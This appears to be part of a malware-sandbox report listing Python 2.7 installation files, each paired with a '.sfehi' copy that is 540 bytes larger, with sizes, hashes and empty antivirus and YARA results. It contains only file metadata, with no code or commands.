CAPE Yara None matched
File name bz2.pyd
Associated Filenames
C:\Python27\DLLs\bz2.pyd
File Size 68608 bytes
File Type data
MD5 92d84d26ac3f7626eb7dcab1931785fc
SHA1 d272c9dfe39773d9dd22540b4e9a2375e2c46ac6
SHA256 bbac10fdba52dff4c363d84c8af876fab4670509d3551898b0f3865ca0795650
CRC32 E0E0569F
Ssdeep 1536:7QV/EdhFLo9z06swgb8+C7xWCxycSlBnsIRozmo6G04dZI6:U/HRHxWCxycQ20G04I6
ClamAV None
Yara None matched
CAPE Yara None matched
File name bz2.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\bz2.pyd.sfehi
File Size 69148 bytes
File Type data
MD5 89c22f35e938616efbe43d9d223368b6
SHA1 510838eab5d349c2df5a85c09cb1b01534ef4606
SHA256 a22d45171faf6f1df2d414a2253e447a57ddb7c493124893663fc6d1e23e3272
CRC32 16A910BC
Ssdeep 1536:7QV/EdhFLo9z06swgb8+C7xWCxycSlBnsIRozmo6G04dZIz:U/HRHxWCxycQ20G04Iz
ClamAV None
Yara None matched
CAPE Yara None matched
File name unicodedata.pyd
Associated Filenames
C:\Python27\DLLs\unicodedata.pyd
File Size 686080 bytes
File Type data
MD5 5ede45c6a1b9240aa937cd0e58bad803
SHA1 d13ce3dd17b69861983c0236ce8c780e609449c0
SHA256 391b0f8d61f79ad804f7d3e4109f9cf3ecb5a77f1018d54106f373113de6fdd1
CRC32 59377196
Ssdeep 12288:bQO3jxeH0Oku8M4Rhoikdn9I/i6Shqe1CJCdWkFF85T9KxIPUH2iVGuIjjfDZvsX:bTjGkux4RhotRGyhbCFkFF8TMHSvfVgb
ClamAV None
Yara None matched
CAPE Yara None matched
File name unicodedata.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\unicodedata.pyd.sfehi
File Size 686620 bytes
File Type data
MD5 2bbfb74597e39236797519c0d4e61f39
SHA1 0717f29ca77b8234476e89832b89512a5b05fc42
SHA256 fb182f639aebb1b3ed21447d6e64cc3e95868c9e79a1f2335838895698074af8
CRC32 89DB96F8
Ssdeep 12288:bQO3jxeH0Oku8M4Rhoikdn9I/i6Shqe1CJCdWkFF85T9KxIPUH2iVGuIjjfDZvsy:bTjGkux4RhotRGyhbCFkFF8TMHSvfVgm
ClamAV None
Yara None matched
CAPE Yara None matched
File name winsound.pyd
Associated Filenames
C:\Python27\DLLs\winsound.pyd
File Size 9216 bytes
File Type data
MD5 640d15092ca0e280e2cdc7db58a42b78
SHA1 cfa2ba39c0abf2e2e986d964879c8ecaaea2e53d
SHA256 8fdb974abce6ab7cb764bf06bb0052ffa2757c04e87af75600167f0aea28f944
CRC32 92D7887A
Ssdeep 192:oYevd+3C1YQmeoFgzQRaqCr3n1QXEaQDTXwDeHPYLCzTbW1O:ozYCnmeoFgzCGnGXEaQQkYmPbW1O
ClamAV None
Yara None matched
CAPE Yara None matched
File name winsound.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\winsound.pyd.sfehi
File Size 9756 bytes
File Type data
MD5 2ddc3672b484c9b12f9046b964ce630b
SHA1 a6f5e8d0881d6858369ce14dafb7d86a025c8020
SHA256 4c8ce224df5c42a9dae40cdd705ab10dfdafd66ae9c7b47bd23837d07d7ad27b
CRC32 29EF1A3F
Ssdeep 192:oYevd+3C1YQmeoFgzQRaqCr3n1QXEaQDTXwDeHPYLCzTbW1AZ0w:ozYCnmeoFgzCGnGXEaQQkYmPbW1AZl
ClamAV None
Yara None matched
CAPE Yara None matched
File name _bsddb.pyd
Associated Filenames
C:\Python27\DLLs\_bsddb.pyd
File Size 1012224 bytes
File Type data
MD5 20d8a3e49c3c913fdd77222567b93d16
SHA1 9f2b803328970630ad1632c3384c15f5b021d37b
SHA256 cd6ac56665a2c3c4f13396c880e531bf0076a09f8a3f1e8258dcc2754ca60bdd
CRC32 313BF864
Ssdeep 24576:CJCKOu837qBdIpOKi7nWPsqO244N81PyqumQYahEA:gtOueWBwOjWFOSc7A
ClamAV None
Yara None matched
CAPE Yara None matched
File name _bsddb.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_bsddb.pyd.sfehi
File Size 1012764 bytes
File Type data
MD5 fbd5f46f0bf5d6ce5091a8e5dada5e27
SHA1 05783bef9962268e043f82cb78469779c3170440
SHA256 29143e7c51d10253f71cfd05c548a95743c4cdfbdaa1467e926001bdc0fc4dc3
CRC32 8EA05E0D
Ssdeep 24576:CJCKOu837qBdIpOKi7nWPsqO244N81PyqumQYahEJ:gtOueWBwOjWFOSc7J
ClamAV None
Yara None matched
CAPE Yara None matched
File name _ctypes_test.pyd
Associated Filenames
C:\Python27\DLLs\_ctypes_test.pyd
File Size 15872 bytes
File Type data
MD5 74f265aac9966686e0750ae635355eb0
SHA1 4a8339908ecb8b27707d1f897c734fc93ef4950f
SHA256 69f29d5b41c966ce0574167c0a7200d57d2729975f2d7015dc461e6c0f650624
CRC32 331FF533
Ssdeep 384:Vz0iT9Z5efm1+xTpKQ1FWlDvKv7ZyJuk/jZ/jW7/dTo:x089ZIlDG2v7Zquk/pjW76
ClamAV None
Yara None matched
CAPE Yara None matched
File name _ctypes_test.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_ctypes_test.pyd.sfehi
File Size 16412 bytes
File Type data
MD5 1bb1a623f40721ee3f9629a644f19be9
SHA1 f8dfbf2c53f3f403c6e0da85f472544d27c37b69
SHA256 c81146de0ee0795e893970984a0b8486dc8b4e6970a202d2fd32ecc7f4fd77f1
CRC32 0D5F761D
Ssdeep 384:Vz0iT9Z5efm1+xTpKQ1FWlDvKv7ZyJuk/jZ/jW7/dTft:x089ZIlDG2v7Zquk/pjW7pt
ClamAV None
Yara None matched
CAPE Yara None matched
File name _elementtree.pyd
Associated Filenames
C:\Python27\DLLs\_elementtree.pyd
File Size 128512 bytes
File Type data
MD5 c2ce0dbf7344fb1e4d1e36b70dbcba81
SHA1 273cfff73980b357fbd5016efaeaa2b2897c8a98
SHA256 b3f81f2fc44171ff637dbd858c092adae649a90221464f6f7b66fbebeeecd4f1
CRC32 5CDB84F2
Ssdeep 3072:FwxdWR+77x0cTW0FwH9VNRZmOiR7HMYunUL88bKP:SxL77xPTW0SHDNRZOOP8g
ClamAV None
Yara None matched
CAPE Yara None matched
File name _elementtree.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_elementtree.pyd.sfehi
File Size 129052 bytes
File Type data
MD5 eb39250b5c32db3e0ef1db638e7b950c
SHA1 fd8b0bfedf443edbbf4673fbf98b758fd63c7d70
SHA256 7f326fb87efd4623459cff94631e94831e500b4722d174bd8747da0158a9800c
CRC32 6ACD4559
Ssdeep 3072:FwxdWR+77x0cTW0FwH9VNRZmOiR7HMYunUL88bKF:SxL77xPTW0SHDNRZOOP8G
ClamAV None
Yara None matched
CAPE Yara None matched
File name _msi.pyd
Associated Filenames
C:\Python27\DLLs\_msi.pyd
File Size 48128 bytes
File Type data
MD5 8135d8ec6983502f6bfba4f1b231f0d0
SHA1 ad99c1774b51483deae16ee292039bca04e7cbd9
SHA256 e3f5f737739c64c248805be0aa4f9df37328087237b55680e61d2b4499d95f87
CRC32 28157ED0
Ssdeep 768:07VuD6xlvWAt/SQQZKD0PgOJMK+qcdZ+U7eaEC9iaesMlBeXtzbwxx6q/d1Efatn:MfOAtMZK2vcysfEHTlMXFbXq11EytN6u
ClamAV None
Yara None matched
CAPE Yara None matched
File name _msi.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_msi.pyd.sfehi
File Size 48668 bytes
File Type data
MD5 a819bc49889c926d157bd9233c9d7b7c
SHA1 c29bf07f30771925291830029660ab8a2799e863
SHA256 49c56d82f36d8725be760aae2a91f334433752bdc65e880b7a6996967f535c82
CRC32 8A60CDA1
Ssdeep 768:07VuD6xlvWAt/SQQZKD0PgOJMK+qcdZ+U7eaEC9iaesMlBeXtzbwxx6q/d1EfatQ:MfOAtMZK2vcysfEHTlMXFbXq11EytN6R
ClamAV None
Yara None matched
CAPE Yara None matched
File name _multiprocessing.pyd
Associated Filenames
C:\Python27\DLLs\_multiprocessing.pyd
File Size 27136 bytes
File Type data
MD5 2fd0712ce1d25c9567b33997a8b72e39
SHA1 0191fce384692dc567f4327d11aa98704fd5e753
SHA256 339f58a802d4c05b1626c5007d2e9f5a16bf0504f813b1467d7ccdea7e004cd1
CRC32 593D2418
Ssdeep 768:fVuBUtfzhN0Vjgp77ErlCjI/JEftnTroDy:f4HgpkB2lJ
ClamAV None
Yara None matched
CAPE Yara None matched
File name _multiprocessing.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_multiprocessing.pyd.sfehi
File Size 27676 bytes
File Type data
MD5 589a0988e4339ecf74cff5aab93f3132
SHA1 bec591a0747b63509c0fa9ce8392d68ed45b85d7
SHA256 49c9197862273bfe05ba1a49714a8a52101d06fc7df4691e2b4110d34cc0f649
CRC32 DD85EA0A
Ssdeep 768:fVuBUtfzhN0Vjgp77ErlCjI/JEftnTroDs:f4HgpkB2lD
ClamAV None
Yara None matched
CAPE Yara None matched
File name _sqlite3.pyd
Associated Filenames
C:\Python27\DLLs\_sqlite3.pyd
File Size 47616 bytes
File Type data
MD5 be5c1c54c7bfc7ce4f813a12926df922
SHA1 0ca9898c505b7207e9c2502c9e3b61cc357c400e
SHA256 00db36565f102e97ef664847e94fa9e41f647ecdac8b0cac509853fea9a607b6
CRC32 C5BBFAC4
Ssdeep 768:LKRxqxyJ3WbtaK4D6peIEAN3Hn1m2QyTQD0mfQ193XDZKz9rXn5Jad4WfwM2crEU:s7KXpeFAN3H1m2QCm4b3XDZKzVXnPau8
ClamAV None
Yara None matched
CAPE Yara None matched
File name _sqlite3.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_sqlite3.pyd.sfehi
File Size 48156 bytes
File Type data
MD5 1bce20ca1912bb8282546a1a0897c903
SHA1 12bd76f4bef86eb977d26133c8f3586164191035
SHA256 d84969154e4416a201dbdc1ebe837fdc61aff9c478748cc9614e43bd9f0db698
CRC32 10AA18F5
Ssdeep 768:LKRxqxyJ3WbtaK4D6peIEAN3Hn1m2QyTQD0mfQ193XDZKz9rXn5Jad4WfwM2crEf:s7KXpeFAN3H1m2QCm4b3XDZKzVXnPauH
ClamAV None
Yara None matched
CAPE Yara None matched
File name _testcapi.pyd
Associated Filenames
C:\Python27\DLLs\_testcapi.pyd
File Size 32768 bytes
File Type data
MD5 f459b276d2ac674d00c90c58d5319ba4
SHA1 d7c074a9ec1d5b28388a4650c5d69f6da3eb9afc
SHA256 dcdced5c12c6faa06f72bd65b9e2aeaa1f3c154225548ed964af370b795c8f0c
CRC32 BA431447
Ssdeep 768:cklbiwf0BkTK/dVgQ99+ela5zKEjfCGjDEnsHzo:tewjKVV991ltQCGjDEnEU
ClamAV None
Yara None matched
CAPE Yara None matched
File name _testcapi.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_testcapi.pyd.sfehi
File Size 33308 bytes
File Type data
MD5 ffef8616c72b3644481c4b69a55d2e4d
SHA1 7efe3414ae3bcfaf728f6ff637ded6d9bdce265e
SHA256 c80bc6e5d917fbc0996db05bb71fc3be54ac3cfe8daa49353e76aecd9b23ba38
CRC32 EF06DD91
Ssdeep 768:cklbiwf0BkTK/dVgQ99+ela5zKEjfCGjDEnsHzr:tewjKVV991ltQCGjDEnEX
ClamAV None
Yara None matched
CAPE Yara None matched
File name python276.chm
Associated Filenames
C:\Python27\Doc\python276.chm
File Size 6010777 bytes
File Type data
MD5 892607a45465d8754638fcf87eaab085
SHA1 83e4f9adc5d25a09d00e51aff4eee719197a4094
SHA256 86ab0653b51d7757be3be0c4f504090a7d5a09fb6b26d43ca3bc4159792b348e
CRC32 4E43FF55
Ssdeep 98304:OSzY/1OmXJrji1GBooQ2fPu77jOmBfS8/I5yNi/BPbwen/AYJdya:OAuj1G1GHpP+95/pwBPbwe/AmT
ClamAV None
Yara None matched
CAPE Yara None matched
File name python276.chm.sfehi
Associated Filenames
C:\Python27\Doc\python276.chm.sfehi
File Size 6011317 bytes
File Type data
MD5 c0fbf37e616bc65d8de453c4f52a9467
SHA1 233093060ae3c85ee17955e376a06a2562fac776
SHA256 ecf4b3c30e9e05ac8323e70b4864f7b3913292c9d7a8fba6cfacc0f8646687f0
CRC32 5E61BEDF
Ssdeep 98304:OSzY/1OmXJrji1GBooQ2fPu77jOmBfS8/I5yNi/BPbwen/AYJdyD:OAuj1G1GHpP+95/pwBPbwe/Am6
ClamAV None
Yara None matched
CAPE Yara None matched
File name abstract.h
Associated Filenames
C:\Python27\include\abstract.h
File Size 46411 bytes
File Type data
MD5 0d9c493c9d498fa7062e28079ffa7ce3
SHA1 a82996f3a09595eea967d98d2a184051bfaaee7c
SHA256 49ea1e5af1d6999a98353d314b65011688fcfb1bef7211a2a62e591c3fedd64a
CRC32 4AD4D703
Ssdeep 768:DDYCOFXOP4JuuxGQNUawyT+S+EgKvWuBzy7FSFgbWLFgmZjw+N74:DDYCOFXIyGK+S+KvFypy+mNw+J4
ClamAV None
Yara None matched
CAPE Yara None matched
File name abstract.h.sfehi
Associated Filenames
C:\Python27\include\abstract.h.sfehi
File Size 46951 bytes
File Type data
MD5 980b08b14c0c5321ff4ab1b8d7be06ff
SHA1 bbfb636c4a84a3936d48ad071f32b4787f407c47
SHA256 0a0757910cde86562dab6d9347c8cf0a1b4ab921db518d797fc999e853717538
CRC32 9D4E55AB
Ssdeep 768:DDYCOFXOP4JuuxGQNUawyT+S+EgKvWuBzy7FSFgbWLFgmZjw+N7i:DDYCOFXIyGK+S+KvFypy+mNw+Ji
ClamAV None
Yara None matched
CAPE Yara None matched
File name asdl.h
Associated Filenames
C:\Python27\include\asdl.h
File Size 1144 bytes
File Type data
MD5 f867c712dba73b4443ea23e851b2e601
SHA1 17f420f1df6410d1a7d09c7428bae220e685b738
SHA256 eb17e28d1b36d468e8c61843041f738d8ae4184cf44e70f1fef6641dcd338632
CRC32 BB82FA31
Ssdeep 24:FbfkrfVMmSyK8JyUCFix05ry9721rUpGjQ5040imMR4fDU9go:VfkrfVgNrFiG5ry9721rUAU50VimK4fi
ClamAV None
Yara None matched
CAPE Yara None matched
File name ast.h
Associated Filenames
C:\Python27\include\ast.h
File Size 243 bytes
File Type data
MD5 40ece169271b1449be8332e159d7d096
SHA1 b2328942a6fa24618657492fe32c03469afd5e3c
SHA256 ebb239b0d1dbccede91772c9b542521821d7a2c2616018b5d88728609dc70c36
CRC32 2D31E0F4
Ssdeep 6:N9Bb1g+LK2CvI7EYue2J5WWWD+gIlBMWim8diftqvNLOnN:N9t1g+LK2suEA2J5y++m8gftqV6nN
ClamAV None
Yara None matched
CAPE Yara None matched
File name asdl.h.sfehi
Associated Filenames
C:\Python27\include\asdl.h.sfehi
File Size 1684 bytes
File Type data
MD5 9a2fab242486ad5bf88b4161bba6687c
SHA1 50f7dea50a30ca2073c8c7d0f0650bbbf4e171c8
SHA256 728c3dab592d1bb13b6244d02764cf9c80618dc24caffd6c600754aeecee152a
CRC32 84660267
Ssdeep 48:VfkrfVgNrFiG5ry9721rUAU50VimK4fD25xK1NBFleLh:Wmfr47w+jqq5xeNpMh
ClamAV None
Yara None matched
CAPE Yara None matched
File name ast.h.sfehi
Associated Filenames
C:\Python27\include\ast.h.sfehi
File Size 783 bytes
File Type data
MD5 67dab2efa246bf59b1003a94939c690e
SHA1 df3bd8a86d82266b059a03b4f89819d1fa267f7f
SHA256 675864e2ef78037753e6281b38cf07e7fd83ce8db0a7d730e85779f5296e5af1
CRC32 F5CC91A3
Ssdeep 24:N9t1nutT62UVMToVSI3k6M93bd4ox+UU0r8:73ud62UVMQd1w44+URw
ClamAV None
Yara None matched
CAPE Yara None matched
File name bitset.h
Associated Filenames
C:\Python27\include\bitset.h
File Size 824 bytes
File Type data
MD5 6df43be6dbee390ca4a7b40fdd2bc0d7
SHA1 7ea192ee41a924a19202767983c11d5f8659ffb3
SHA256 f61bb2b330aad50dac17d8d251ad1a37dad2f22f1c155b015443971805012549
CRC32 E98759FD
Ssdeep 12:moodROMKkV5mPxceIbGpvwK1FuYija2QUBDj4qzevfhUqOFviFfw6UUiKJUlARSH:fodoTumPxclb81FXYaBXT8qlw/05SzJt
ClamAV None
Yara None matched
CAPE Yara None matched
File name bitset.h.sfehi
Associated Filenames
C:\Python27\include\bitset.h.sfehi
File Size 1364 bytes